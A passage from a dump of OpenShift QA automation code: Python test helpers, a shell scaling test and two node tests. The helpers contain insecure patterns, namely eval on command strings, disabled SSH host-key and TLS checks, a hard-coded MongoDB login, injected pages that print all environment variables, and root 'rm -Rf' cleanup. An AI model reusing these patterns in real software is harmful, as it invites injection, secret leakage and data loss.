user_passwd) = get_default_rhlogin()\n try:\n app_dict = user_info(user_email, user_passwd)\n retcode = 0\n for app_name in app_dict.keys():\n ret = destroy_app2(app_name, user_email, user_passwd)\n if ret != 0:\n retcode = ret\n # Hot fix for Bug 958619\n # delete the app a second time\n # ret = destroy_app2(app_name, user_email, user_passwd)\n # if ret != 0:\n # retcode = ret\n except:\n #this is the case, when cache file is missing\n pass\n\n try:\n rest = openshift.Openshift(host=get_instance_ip(), \n user=user_email, \n passwd=user_passwd)\n (status, l2) = rest.app_list()\n\n if (status == 'OK'):\n for app in l2:\n app_name = app['name']\n try:\n (stat, resp) = rest.app_delete(app_name)\n except Exception as e:\n log.error(\"Unable to destroy %s: %s\"%(app_name, str(e)))\n try:\n if os.path.exists(app_name):\n shutil.rmtree(app_name)\n except:\n pass\n else:\n log.warning(\"Unable to get the list of apps to clean up: status = %s\"%status)\n except openshift.OpenShiftNullDomainException:\n pass\n except Exception as e:\n import traceback\n traceback.print_exc(file=sys.stderr)\n log.error(\"Problem when destroying applications: %s\"%str(e))\n\n try:\n OSConf.initial_conf()\n except Exception as e:\n log.warn(\"Error during initialising cache: %s\"% e)\n\n return retcode\n\n\ndef raw_str(regex):\n special_chars = (\".\", \"^\", \"$\", \"*\", \"+\", \"?\", \"\\\\\", \"|\", \"{\", \"}\", \"[\", \"]\", \"(\", \")\")\n result = []\n l = 0\n r = 0\n while r < len(regex):\n if regex[r] in special_chars:\n if l < r:\n result.append(regex[l:r])\n result.append(\"\\\\\" + regex[r])\n l = r + 1\n r += 1\n if l < r:\n result.append(regex[l:r])\n return ''.join(result)\n\n\ndef getRandomString(length = 10):\n return get_random_string(length)\n\n\ndef rhcsh(app_name, commands):\n '''\n Execute commands inside rhcsh shell:\n `commands' as an argument has to be list of pexpect commands:\n [\n (<sendline|expect>, <value>, [timeout_in_seconds]),\n ('sendline', 'ls -l'),\n ('expect', '/tmp/*',10),\n ('sendline', 'cd /bin'),\n ('sendline', 'exit'),\n ]\n '''\n ssh_url = OSConf.get_app_url(app_name)\n username = OSConf.get_app_uuid(app_name)\n ssh_options = \" -t -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no \"\n p = pexpect.spawn('ssh %s %s@%s rhcsh '%(ssh_options, username, ssh_url))\n p.logfile = sys.stdout\n for cmd in commands:\n eval(\"p.%s('%s')\"%cmd)\n p.terminate(force=True)\n\n return 0\n\n\ndef run_remote_cmd_as_root2(cmd, host=None, quiet=False):\n \"\"\"\n If host==None => \"broker\" (sufficient in single node environment)\n \"\"\"\n return run_remote_cmd2(None, cmd, as_root=True, host=host, quiet=quiet)\n\n\ndef run_remote_cmd_as_root(cmd, host=None, quiet=False):\n \"\"\"\n If host==None => \"broker\" (sufficient in single node environment)\n \"\"\"\n return run_remote_cmd(None, cmd, as_root=True, host=host, quiet=quiet)\n\n\ndef run_remote_cmd(app_name, cmd, as_root=False, host=None, quiet=False):\n \"\"\"Using paramiko client\"\"\"\n if as_root:\n user = 'root'\n if not host:\n #host = get_instance_ip()\n ssh_url = OSConf.get_ssh_url(app_name)\n host = os.popen('ssh %s hostname'%ssh_url).read().strip('\\n')\n key_filename = get_root_ssh_key()\n else:\n user = OSConf.get_app_uuid(app_name)\n if not host:\n host = OSConf.get_app_url(app_name)\n key_filename = get_default_ssh_key()\n return rcmd_get_status_output(cmd, user, host, key_filename, quiet)\n\n\ndef run_remote_cmd2(app_name, cmd, as_root=False, host=None, quiet=False):\n \"\"\"\n Using ssh client\n \"\"\"\n if as_root:\n user = 'root'\n if not host:\n host = get_instance_ip()\n key_filename = get_root_ssh_key()\n else:\n user = OSConf.get_app_uuid(app_name)\n if not host:\n host = OSConf.get_app_url(app_name)\n key_filename = get_default_ssh_key()\n return rcmd_get_status_output2(cmd, user, host, key_filename, quiet)\n\n\ndef check_json_web_page(url, touples, options='-H \"Pragma:no-cache\"', delay=5, count=1):\n '''fetch a page and check JSON'''\n log.debug(\"Trying to find all the touples in %s\" % (url))\n fetch_cmd = \"curl -k -s %s '%s'\" % (options, url)\n # Retry 4 times\n retcode = 1\n for i in range(count):\n time.sleep(delay)\n (retcode, output) = command_getstatusoutput(fetch_cmd, quiet = True)\n if retcode == 0:\n json_array = json.loads(output) #get the dict\n for key in json_array:\n for touple in touples:\n if (key == touple[0] and json_array[key]==touple[1]):\n print \"Found results:\"\n return 0\n return 1\n\n\n#@exclusive\ndef restore_config():\n (user, passwd) = get_default_rhlogin()\n f = open(\"%s/libra_server-%s\"%(get_tmp_dir(), user), 'r')\n libra_ip = f.read().strip()\n libra_ip.strip()\n log.debug(\"Restoring libra server to default\")\n cmd = \"sed -i 's/libra_server=%s/libra_server=$libra_ip/g' %s\" % (libra_ip.strip(), express_conf_file)\n os.system(cmd)\n\n\nclass Error(Exception):\n \"\"\"Base class for exceptions in this module.\"\"\"\n def __init__(self, msg):\n self.msg = msg\n def __str__(self):\n return repr(self.msg)\n\n\nclass InputError(Error):\n \"\"\"Exception raised for errors in the input.\n\n Attributes:\n expr -- input expression in which the error occurred\n msg -- explanation of the error\n \"\"\"\n pass\n\n\ndef check_ip_type(ip, expected_type, str=''):\n try:\n \tif expected_type == str:\n\t if type(ip) is not str:\n\t return type(str(ip)) is str\n\tif expected_type == int:\n\t if type(ip) is not int:\n\t\treturn type(int(ip)) is int\n\tif expected_type == list:\n\t if type(ip) is str:\n\t\treturn type(eval(ip)) is list\n\t else:\n\t\treturn type(ip) is list\n\tif expected_type == dict:\n\t if type(ip) is dict:\n\t\treturn type(eval(ip)) is dict\n\t else:\n\t\treturn type(ip) is dict\n except:\n\traise InputError(\"% s, expected %s, got %s\" % (str, expected_type, ip))\n\n\ndef get_work_dir():\n WORK_DIR = os.path.dirname(os.path.abspath(__file__))\n return WORK_DIR\n\n\ndef get_app_tmpl_dir():\n return \"\"\n\n\ndef sleep(delay):\n time.sleep(delay)\n\n\ndef fetch_page_curl(url, options='-H \"Pragma:no-cache\" -L'):\n \"\"\"Returns (status, output) from curl\"\"\"\n fetch_cmd = \"curl -k -s %s '%s'\" % (options, url)\n return cmd_get_status_output(fetch_cmd)\n\n\ndef fetch_page(url, headers={}):\n \"\"\"Returns body of web page, otherwise None if error occured\"\"\"\n\n if not url.startswith('http'):\n url = 'http://'+url\n log.debug(\"Fetching %s\"%url)\n import httplib2\n proxy = None\n if os.getenv('http_proxy'):\n obj = re.search(r\"http://([^:]+):(\\d+)\", os.getenv('http_proxy'))\n if obj:\n proxy_host = obj.group(1)\n proxy_port = int(obj.group(2))\n\n if url.startswith('https'):\n proxy_type=httplib2.socks.PROXY_TYPE_HTTP\n else:\n proxy_type=httplib2.socks.PROXY_TYPE_HTTP_NO_TUNNEL\n\n proxy = httplib2.ProxyInfo(proxy_type=proxy_type, \n proxy_host=proxy_host, \n proxy_port=proxy_port)\n else:\n log.warning(\"Wrong format of http_proxy!\")\n\n conn = httplib2.Http(cache=None, timeout=CONNECT_TIMEOUT, proxy_info=proxy,\n disable_ssl_certificate_validation=True)\n _headers = {'Content-type': 'text/html;charset=utf-7)',\n 'User-Agent': 'Python-httplib2/7 (gzip)',\n 'Accept': '*/*',\n 'Pragma': 'no-cache' }\n if isinstance(headers, dict):\n if len(headers)>0:\n _headers.update(headers)\n elif isinstance(headers, str):\n obj = re.search(re.compile(\"-u\\s+['\\\"]?([^:]+):([^\\s'\\\"]+)\"), headers)\n if obj:\n _headers.update(get_auth_headers(obj.group(1), obj.group(2)))\n \n (response, content) = conn.request(uri=url, method='GET', headers=_headers)\n #print \"***>>>\"*20\n #print \"url : %s\"%url\n #print \"content : %s\"%content\n #print \"response : %s\"%response\n #print \"***<<<\"*20\n\n if response.status >= 400:\n log.warning(\"fetch_page(%s): %s\"%(url, response.reason))\n return content\n\n\ndef get_default_ssh_key():\n return get_default_ssh_key_()\n\n\ndef get_root_ssh_key():\n return get_root_ssh_key_()\n\n\ndef setup_c9_environment(node=None, user_email=None):\n if user_email is None:\n (user_email, user_passwd) = get_default_rhlogin()\n\n try:\n change_node_profile(\"c9\", node=node)\n add_gearsize_capability(\"c9\", user_email)\n set_user_capability(\"allowsubaccounts\",\"true\", user_email)\n except Exception as e:\n log.error(\"%s\"%str(e))\n return 1\n\n return 0\n\n\ndef has_node_profile(profile):\n \"\"\"\n Returns True/False whether environment has at least one node with such profile\n \"\"\"\n if not is_multinode_env():\n return (profile == get_node_profile())\n else:\n for d in get_districts():\n for si in d['server_identities']:\n if si['node_profile'] == profile:\n return True\n return False\n\n\ndef is_multinode_env():\n log.info(\"MULTI NODE is not yet fully tested/supported\")\n return False\n if len(get_nodes())>1:\n return True\n return False\n\n\ndef get_facter(fact=None, node=None):\n (status, output) = run_remote_cmd_as_root(\"facter %s\"%fact, node, quiet=True)\n if status == 0:\n return output.strip()\n else:\n log.error(output)\n return status\n\n\ndef get_node_profile(server_identity=None, node=None):\n \"\"\"\n Returns True/False whether environment has at least one node with such profile\n * if server_identity==None => broker\n * node => public IP address (facter method will be used)\n * server_identity => private IP address (will be used district table from mongo)\n \"\"\"\n if not is_multinode_env():\n return get_facter(\"node_profile\")\n\n if node is not None:\n return get_facter(\"node_profile\", node)\n\n for d in get_districts():\n for si in d['server_identities']:\n if si['name'] == server_identities:\n return si['node_profile']\n return None\n\n\ndef change_node_profile(gear_size = \"small\", safe_mode=True, node=None):\n \"\"\"\n * if node==None => use the Broker\n * safe_mode => revert back if any problems...\n * if the given node is of such profile, there will be none change \n * if such profile is already in that cluster, there will none change as well\n * if node!=None\n \"\"\"\n if is_multinode_env():\n if node is None and has_node_profile(gear_size):\n log.debug(\"Don't need to change profile => env already contains such profile\")\n return 0\n else:\n if get_node_profile(node) == gear_size:\n log.debug(\"No profile change -> node[%s] has such profile[%s] already.\"%(node, gear_size))\n return 0\n\n config_file = \"/etc/openshift/resource_limits.conf\"\n config_steps = [\n \"rm -fv %s\" % ( config_file ),\n \"ln -v -s %s.%s %s\" % ( config_file, gear_size, config_file ),\n \"/usr/libexec/mcollective/update_yaml.rb /etc/mcollective/facts.yaml\"]\n\n ret = run_remote_cmd_as_root(\" && \".join(config_steps), host=node)[0]\n if safe_mode and ret != 0:\n log.error(\"ERROR detected => Setting default profile...\")\n config_steps = [\n \"rm -fv %s\" % ( config_file ),\n \"ln -v -s %s.%s %s\" % ( config_file, \"small\", config_file ),\n \"/usr/libexec/mcollective/update_yaml.rb /etc/mcollective/facts.yaml\",\n \"sleep 5\"]\n\n run_remote_cmd_as_root(\" && \".join(config_steps), host=node)[0]\n\n return ret\n\n\ndef get_cgroup_threshold(uuid, controller, attribute):\n ( ret_code, ret_output ) = run_remote_cmd_as_root(\n \"cat /cgroup/all/openshift/%s/%s.%s\" % ( uuid, controller, attribute )\n )\n return int(ret_output.strip())\n\n\ndef get_lib_dir():\n return os.path.dirname(os.path.join(os.path.abspath(__file__),\"../../\"))\n\n\ndef get_etc_dir():\n return os.path.abspath(get_lib_dir() + \"/../etc\")\n\n\ndef get_domain_name(user_email=None, user_passwd=None):\n return get_domain_name_(user_email, user_passwd)\n\n\ndef isDNS(output):\n \"\"\" Returns True if the response contains notes regarding DNS issues. \"\"\"\n err_strings = [\"WARNING: We were unable to lookup your hostname\",\n \"retry # 7 - Waiting for DNS:\"]\n for st in err_strings:\n obj = re.search(st, output)\n if obj:\n return True\n\n return False\n\n\ndef is500(output):\n \"\"\"\n Function validates the given output and returns True, if contains 500 \n exit code (Internal Server Error) lines.\n \"\"\"\n err_strings = [\"Response code was 500\", \"Internal Server Error\"]\n for st in err_strings:\n obj = re.search(st, output)\n if obj:\n return True\n\n return False\n\n\ndef setup_testbed(**kwargs):\n \"\"\"\n obj is rhtest object\n\n setup a testbed for subsequent tests. There are several modes that can be \n run.\n 0. plain (no domain, no app)\n 1. basic (has a domain name, no app)\n 2. common (has a domain name, one app)\n\n \"\"\"\n klass = kwargs['klass']\n cf = klass.config\n rest = cf.rest_api\n\n if len(kwargs) == 0:\n kwargs['mode'] = 1\n\n mode = kwargs['mode']\n \n status, res = rest.domain_get()\n if status == 'OK':\n cf.domain_name = res\n status, res = rest.app_list()\n if len(res) > 0:\n # found an existing app, we are good to go.\n cf.app_name = res[0]['name']\n else:\n if mode == 2:\n cf['app_name'] = getRandomString()\n if not kwargs.has_key('app_type'):\n # make php the default\n app_type = app_types['php']\n else:\n app_type = app_types[kwarg['app_type']]\n klass.info(\"Creating an app '%s' of type '%s'...\" % (cf.app_name, app_type))\n status, res = rest.app_create(cf.app_name, app_type)\n self.info(\"xxx\", 1)\n else:\n cf['domain_name'] = getRandomString()\n self.info(\"No domain found, creating an new one '%s'...\" % cf.domain_name)\n status, res = rest.domain_create(cf.domain_name)\n return cf\n\n\ndef trigger_jenkins_build(git_repo, try_count=3, try_interval=5, quiet=False, timeout=COMMAND_TIMEOUT):\n unexpected_str_lst = [\"BUILD FAILED/CANCELLED\", \"Deployment Halted\"]\n for i in range(try_count):\n flag = True\n print \"-\" * 80\n print \"Trying to trigger jenkins build - %d\" % (i)\n print \"-\" * 80\n cmd = \"cd %s && echo '%d\\n' >> jenkins_trigger.txt && git add . && git commit -amt && git push\" % (git_repo, i)\n (ret, output) = command_getstatusoutput(cmd, quiet, timeout)\n for s in unexpected_str_lst:\n if output.find(s) != -1:\n time.sleep(try_interval)\n flag = False\n break\n if flag == True:\n return True\n return False\n\n\ndef create_subdomain(sub_domain, sub_account, user=None, passwd=None):\n if user is None:\n (user, passwd) = get_default_rhlogin()\n headers = \"-H 'Accept: application/json' -H 'X-Impersonate-User: %s'\"%sub_account\n headers += \" --user %s:%s\"%(user, passwd) \n data = \" -d id=%s \"%sub_domain\n url = \"https://%s//broker/rest/domains\"%get_instance_ip()\n cmd = \"curl %s -s -k -X POST -d nolinks=1 -d id=%s %s\"%(headers, data, url) \n return cmd_get_status_output(cmd, quiet=True)[0]\n\n\ndef get_public_key_type(key='default'):\n try:\n f = open(get_default_ssh_key_()+\".pub\", 'r')\n dump = f.read()\n f.close()\n obj = re.search(r'^(ssh-...)\\s+([\\S]+)', dump)\n if obj:\n return obj.group(1)\n except Exception as e:\n log.error(\"Unable to dump public key: %s\"%str(e))\n\n return None\n\n\ndef dump_public_key(key='default'):\n try:\n f = open(get_default_ssh_key_()+\".pub\", 'r')\n dump = f.read()\n f.close()\n obj = re.search(r'^ssh-...\\s+([\\S]+)', dump)\n if obj:\n return obj.group(1)\n except Exception as e:\n log.error(\"Unable to dump public key: %s\"%str(e))\n\n return None\n\ndef add_sshkey4sub_account(sub_account, user=None, passwd=None):\n #curl -k -X POST -H 'Accept: application/json' -H 'X-Impersonate-User: <sub_account>' --data-urlencode name=default -d type=<ssh-rsa|ssh-dss> --data-urlencode content=<public_ssh_key_value>--user <your_rhlogin>:<password> https://openshifttest.redhat.com/broker/rest/user/keys\n if user is None:\n (user, passwd) = get_default_rhlogin()\n headers = \"-H 'Accept: application/json' -H 'X-Impersonate-User: %s' \"%sub_account\n headers += \" --user %s:%s \"%(user, passwd)\n data = \" -d nolinks=1 -d name=default -d type=ssh-rsa --data-urlencode content='%s'\"%dump_public_key()\n url = \"https://%s//broker/rest/user/keys\"%get_instance_ip()\n cmd = \"curl -s -k -X POST %s %s %s\"%(headers, data, url) \n return cmd_get_status_output(cmd, quiet=True)\n\n\ndef create_app_using_subaccount(sub_domain, sub_account, app_name, app_type, user=None, passwd=None):\n #curl -k -X POST -H 'Accept: application/json' -H 'X-Impersonate-User: <sub_account>' -d name=<app_name> -d cartridge=<cartridge_type> -d gear_profile=c9 --user <your_rhlogin>:<password> https://openshifttest.redhat.com/broker/rest/domains/<sub_domain>/applications\n if user is None:\n (user, passwd) = get_default_rhlogin()\n headers = \"-H 'Accept: application/json' -H 'X-Impersonate-User: %s' \"%sub_account\n headers += \" --user %s:%s \"%(user, passwd) \n data = \" -d nolinks=1 -d name=%s -d cartridge=%s -d gear_profile=c9 \"%(app_name, app_type)\n url = \"https://%s//broker/rest/domains/%s/applications\"%(get_instance_ip(), sub_domain)\n cmd = \"curl -s -k -X POST %s %s %s\"%(headers, data, url) \n (status, output) = cmd_get_status_output(cmd, quiet=True)\n obj = json.loads(output)\n if obj['status'] not in ('OK', 'Created', 'created'):\n status = 1\n return (status, obj)\n\n\n\ndef touch(filename):\n try:\n f = open(os.path.normpath(filename),'w')\n f.write(' ')\n f.close()\n return 0\n except:\n return 1\n\n\ndef git_commit_push_all(app_name):\n cmds = [\n \"cd %s\" % (app_name),\n \"git add .\",\n \"git commit -a -m hurray\",\n \"git push\"]\n return command_get_status(\" && \".join(cmds))\n\n\ndef inject_app_index_with_env(app_name, app_type):\n \"\"\"\n Create /env.[php|pl|jsp|...] page with list of environmental variables\n Runs 'git commit|push' with this change\n Returns 0 if success\n \"\"\"\n if not os.path.exists(app_name):\n raise Exception(\"App dir doesn't exist\")\n if app_type.startswith('php'):\n content = r\"\"\"<?php header(\"Content-Type: text/plain\"); \n foreach ($_ENV as $key => $val){ \n echo \"$key=$val\\n\"; \n } ?>\"\"\"\n xfile = \"php/env.php\"\n elif app_type.startswith(\"nodejs\"):\n xfile = \"server.js\"\n f = open(os.path.join(app_name, xfile), 'r')\n content = f.read()\n f.close()\n new = r\"\"\"\n self.routes['/env.js'] = function(req, res) {\n var result = '';\n for (var key in process.env){\n result = result + key +'='+process.env[key] + \"\\n\";\n }\n res.send(result);\n };\"\"\"\n seek_str=r\"Routes for \"\n content = inject_string_by_re(seek_str, new, content, after=False)\n\n elif app_type.startswith(\"ruby\") or app_type.startswith(\"rack\"):\n xfile = \"config.ru\"\n f = open(os.path.join(app_name, xfile), 'r')\n content = f.read()\n f.close()\n seek_str1 = \"map '/health' do\"\n seek_str2 = \"get '/' do\"\n if content.find(seek_str1) != -1:\n seek_str = seek_str1\n new = r\"\"\"\nmap '/env.rb' do\n xenv = proc do |env|\n output = \"\"\n ENV.each do|k,v|\n output += \"#{k}=#{v}\\n\"\n end\n [200, { \"Content-Type\" => \"text/html\" }, [output]]\n end\n run xenv\nend\"\"\"\n else:\n seek_str = seek_str2\n new = r\"\"\"\nget '/env.rb' do\n output = \"\"\n ENV.each do|k,v|\n output += \"#{k}=#{v}\\n\"\n end\n response_body = [200, output]\nend\n\"\"\"\n\n content = inject_string_by_re(seek_str, new, content, after=False)\n\n elif app_type.startswith(\"jboss\"):\n xfile = \"src/main/webapp/env.jsp\"\n content = \"\"\"\n <%@ page contentType=\"text/plain\" language=\"java\" import=\"java.sql.*\" %>\n <%@ page import=\"javax.naming.*\" %>\n <%@ page import=\"java.util.*\" %>\n <%@ page trimDirectiveWhitespaces=\"true\" %>\n <%\n Map envs = System.getenv();\n Set keys = envs.keySet();\n Iterator i = keys.iterator();\n while (i.hasNext()) {\n String k = (String) i.next();\n String v = (String) envs.get(k);\n out.println(k+\"=\"+v);\n }\n %>\"\"\"\n\n elif app_type.startswith(\"perl\"):\n xfile = \"perl/env.pl\"\n content = r\"\"\"#!/usr/bin/perl\nprint \"Content-type: text/plain\\r\\n\\r\\n\";\nforeach my $key (sort keys %ENV) {\n print \"$key=$ENV{$key}\\n\";\n}\"\"\"\n\n elif app_type.startswith(\"python\") or app_type.startswith(\"wsgi\"):\n xfile = \"wsgi/application\"\n f = open(os.path.join(app_name, xfile), 'r')\n content = f.read()\n seek_str = \"PATH_INFO.+/env\"\n new = \"\"\"\n elif environ['PATH_INFO'] == '/env.py':\n response_body = \"\"\n for k in os.environ.keys():\n response_body += \"%s=%s\\\\n\"%(k, os.environ[k])\n\"\"\"\n content = inject_string_by_re(seek_str, new, content, after=False)\n else:\n raise Exception(\"Unknown cartridge: %s\"%app_type)\n\n write_file(os.path.join(app_name, xfile) ,content)\n return git_commit_push_all(app_name)\n\n\ndef git_clone_app(app_name):\n git_url = OSConf.get_git_url(app_name)\n if not git_url:\n pass\n \n cmd = \"git clone %s\"% git_url\n (status, output) = cmd_get_status_output(cmd)\n return status\n\n\ndef type_to_cart(app_type):\n return ''.join(app_type.split('-')[:-1]).upper()\n\n\ndef random_variant(valid_variant_list=[]):\n if valid_variant_list == []:\n valid_variant_list = app_types.keys()\n try:\n valid_variant_list.remove('jenkins')\n except ValueError:\n pass\n return random.choice(valid_variant_list)\n" }, { "alpha_fraction": 0.5592654347419739, "alphanum_fraction": 0.5692821145057678, "avg_line_length": 26.227272033691406, "blob_id": "db8cd423f311df50724c3f49300403ae242dcf39", "content_id": "b6149b6197b57475f5db9e5d21b2cddc37be3e69", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1198, "license_type": "no_license", "max_line_length": 70, "num_lines": 44, "path": "/automation/open/Longevity/scaling_negative/scaling_negative.sh", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/bin/bash\napp_type=$1\npwd=$(pwd)\ntime=$(date +%Y%m%d-%H%M%S)\nlog=\"$pwd/${0%.*}_${time}.log\"\n\n[ -f function.sh ] || ln -s $(pwd)/../function.sh function.sh\n[ -f common_func.sh ] || ln -s $(pwd)/../common_func.sh common_func.sh\n[ -f AutoCreate.cfg ] || ln -s $(pwd)/../AutoCreate.cfg AutoCreate.cfg\n[ -d testdir ] && rm -rf testdir/* || mkdir testdir\n. ./function.sh\ncd testdir\n#run set_running_parameter\n\n#################################################\n# $0 $app_type\n#################################################\nscaling_negative()\n{\n# app_create $1\n# rest_api scale-up $app_name\n# scale_check $app_name scale-up\n# [ $? -eq 0 ] && echo_red \"Scale-up should be failed!\" && exit\n \n run rest_api create $1\n run url_check $app_name\n run rest_api scale-up $app_name\n run scale_check $app_name scale-up\n run url_check $app_name\n\n run rest_api scale-down $app_name\n run scale_check $app_name scale-down\n run url_check $app_name\n run rest_api scale-down $app_name\n run url_check $app_name\n run app_delete $app_name\n}\n\nif [ $# -ne 1 ];then\n echo \"Please input the correct format,such as:\"\n echo \"$0 php-5.10\"\nelse\n run scaling_negative $1\nfi\n" }, { "alpha_fraction": 0.6142284274101257, "alphanum_fraction": 0.6179024577140808, "avg_line_length": 34.630950927734375, "blob_id": "5c0ab2bc59796df07ee39bb0bada73202de52271", "content_id": "35cd3f2250d0104b29b2a8a0f996b76fc5fbb81b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2994, "license_type": "no_license", "max_line_length": 148, "num_lines": 84, "path": "/automation/open/testmodules/RT/node/app_limit_per_user-normal_creation.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "import sys\nimport subprocess\nimport os\nimport string\n\nimport rhtest\nimport testcase\nimport common\nimport OSConf\n\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n self.summary= \"Application limit per user validation on single/multiple node\"\n self.user_email = self.config.OPENSHIFT_user_email\n self.user_passwd = self.config.OPENSHIFT_user_passwd\n self.app_type = common.app_types[\"php\"]\n self.app_name_prefix = common.getRandomString(5)\n try:\n self.app_limit_per_user = string.atoi(os.environ[\"OPENSHIFT_app_limit_per_user\"])\n except:\n self.info(\"Missing OPENSHIFT_app_limit_per_user, used 3 as default\")\n self.app_limit_per_user=3\n\n self.app_name = \"%s%s\" %(self.app_name_prefix, self.app_limit_per_user + 1)\n self.steps_list = []\n common.env_setup()\n\n def finalize(self):\n os.system(\"rm -rf %s*\" %self.app_name_prefix)\n common.destroy_app(self.app_name, self.user_email, self.user_passwd)\n case.add_clean_up(\"rm -rf %s\"%(self.app_name))\n\nclass AppLimitPerUserNormalCreation(OpenShiftTest):\n\n def create_apps_one_by_one(self, start, end):\n for i in range(start, end + 1):\n app_name = \"%s%s\" %(self.app_name_prefix, i)\n ret = common.create_app(app_name, self.app_type, self.user_email, self.user_passwd)\n if ret != 0:\n print \"---BAD---\"\n break\n return ret\n def test_method(self):\n self.steps_list.append(testcase.TestCaseStep(\"Create %s apps one by one according to app_limit_per_user setting\" %(self.app_limit_per_user),\n self.create_apps_one_by_one,\n function_parameters=[1, self.app_limit_per_user],\n expect_return=0,\n expect_description=\"Apps should be created successfully\"))\n\n self.steps_list.append(testcase.TestCaseStep(\n \"Try to create one more app to validate app_limit_per_user\",\n \"rhc app create %s %s -l %s -p '%s' %s\"\n %(self.app_name, self.app_type, self.user_email, self.user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_return=\"!0\",\n expect_string_list=[\"already reached the application limit of\"],\n expect_description=\"No more app should be created\"))\n\n\n case = testcase.TestCase(self.summary, self.steps_list)\n case.run()\n\n if case.testcase_status == 'PASSED':\n return self.passed(\"%s passed\" % self.__class__.__name__)\n if case.testcase_status == 'FAILED':\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(AppLimitPerUserNormalCreation)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.5213244557380676, "alphanum_fraction": 0.5306820273399353, "avg_line_length": 37.59027862548828, "blob_id": "ccbf816fc820afdd674d289cdfb39b8d4fa6c868", "content_id": "1d25d71d1efe6043d3353e3fe575182ecff9c0e4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5557, "license_type": "no_license", "max_line_length": 161, "num_lines": 144, "path": "/automation/open/testmodules/RT/node/rhc_admin_check.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\n\"\"\"\nAttila Nagy\[email protected]\n\n[US2031][BusinessIntegration][Mirage] oo-admin-chk [ruby]\nhttps://tcms.engineering.redhat.com/case/141104/\n\"\"\"\n\nimport os\nimport sys\n\nWORK_DIR = os.path.dirname(os.path.abspath(__file__))\ntestdir = os.path.normpath(WORK_DIR + \"/../../../\")\nsys.path.append(testdir)\n\nimport rhtest\nimport common\nimport OSConf\n\nclass OpenShiftTest(rhtest.Test):\n ITEST = \"DEV\"\n\n def initialize(self):\n self.app_name = common.getRandomString(10)\n self.app_name2 = common.getRandomString(10)\n try:\n self.app_type = self.get_variant()\n except:\n self.app_type = 'php'\n self.summary = \"[US2031][BusinessIntegration][Mirage] oo-admin-chk\"\n\n \tcommon.env_setup()\n\n def finalize(self):\n pass\n\nclass RhcAdminCheck(OpenShiftTest):\n def run_rhc_admin_check(self):\n cmd = \"oo-admin-chk\"\n return common.run_remote_cmd(None, cmd, True)\n\n def remove_apps_from_mongo(self):\n mongo_script = [\n \"use admin\",\n \"db.auth('libra', 'momo')\",\n \"use openshift_broker_dev\",\n \"u = db.user.findOne( { '_id' : '%s' } )\" % self.config.OPENSHIFT_user_email,\n \"u['apps'] = [ ]\",\n \"u['consumed_gears'] = 0\",\n \"db.user.save(u)\" \n ]\n run_steps = [\n 'echo \"%s\"' % \"\\n\".join(mongo_script),\n 'mongo' \n ]\n return common.run_remote_cmd_as_root(\" | \".join(run_steps))\n \n def finalize(self):\n self.remove_apps_from_mongo()\n for app_name in [ self.app_name, self.app_name2 ]:\n uuid = OSConf.get_app_uuid(app_name)\n app_url = OSConf.get_app_url(app_name)\n common.destroy_app(app_name)\n if uuid != 1:\n common.run_remote_cmd_as_root(\"rm -Rf /var/lib/openshift/%s\" % uuid, app_url)\n common.run_remote_cmd_as_root(\"rm -Rf /var/lib/openshift/%s-*\" % app_name, app_url)\n\n def test_method(self):\n self.info(\"===============================\")\n self.info(\"1. Creating an application\")\n self.info(\"===============================\")\n common.create_app(self.app_name, common.app_types[self.app_type], self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd, clone_repo=False)\n \n self.info(\"===============================\")\n self.info(\"2. oo-admin-chk\")\n self.info(\"===============================\")\n ( ret_code, ret_output ) = self.run_rhc_admin_check()\n self.assert_equal(ret_code, 0)\n self.assert_true(ret_output.find(\"Success\") != -1)\n \n self.info(\"===============================\")\n self.info(\"3. Removing application directory on the node\")\n self.info(\"===============================\")\n uuid = OSConf.get_app_uuid(self.app_name)\n app_url = OSConf.get_app_url(self.app_name)\n ( ret_code, ret_output ) = common.run_remote_cmd_as_root(\"rm -Rf /var/lib/openshift/%s\" % uuid, app_url)\n ( ret_code, ret_output ) = self.run_rhc_admin_check()\n self.assert_false(ret_code == 0)\n self.assert_true(ret_output.find(\"does not exist on any node\") != -1)\n \n self.info(\"===============================\")\n self.info(\"4. Fix the problem by removing the application from MongoDB and run oo-admin-check\")\n self.info(\"===============================\")\n self.remove_apps_from_mongo()\n ( ret_code, ret_output ) = self.run_rhc_admin_check()\n self.assert_equal(ret_code, 0)\n self.assert_true(ret_output.find(\"Success\") != -1)\n \n self.info(\"===============================\")\n self.info(\"5. Create another application\")\n self.info(\"===============================\")\n common.create_app(self.app_name2, common.app_types[self.app_type], self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd, clone_repo=False)\n \n self.info(\"===============================\")\n self.info(\"6. Remove the application from MongoDB\")\n self.info(\"===============================\")\n self.remove_apps_from_mongo()\n ( ret_code, ret_output ) = self.run_rhc_admin_check()\n self.assert_false(ret_code == 0)\n \n self.info(\"===============================\")\n self.info(\"7. Fix the problem by removing the application directory on the node\")\n self.info(\"===============================\")\n uuid = OSConf.get_app_uuid(self.app_name2)\n app_url = OSConf.get_app_url(self.app_name2)\n common.run_remote_cmd_as_root(\"rm -Rf /var/lib/openshift/%s\" % uuid, app_url)\n ( ret_code, ret_output ) = self.run_rhc_admin_check()\n self.assert_equal(ret_code, 0)\n self.assert_true(ret_output.find(\"Success\") != -1)\n \n self.info(\"===============================\")\n self.info(\"8. Configuring consumed_gears property incorrectly (Bug 816462)\")\n self.info(\"===============================\")\n common.run_remote_cmd_as_root(\"oo-admin-ctl-user -l %s --setconsumedgears 999\" % 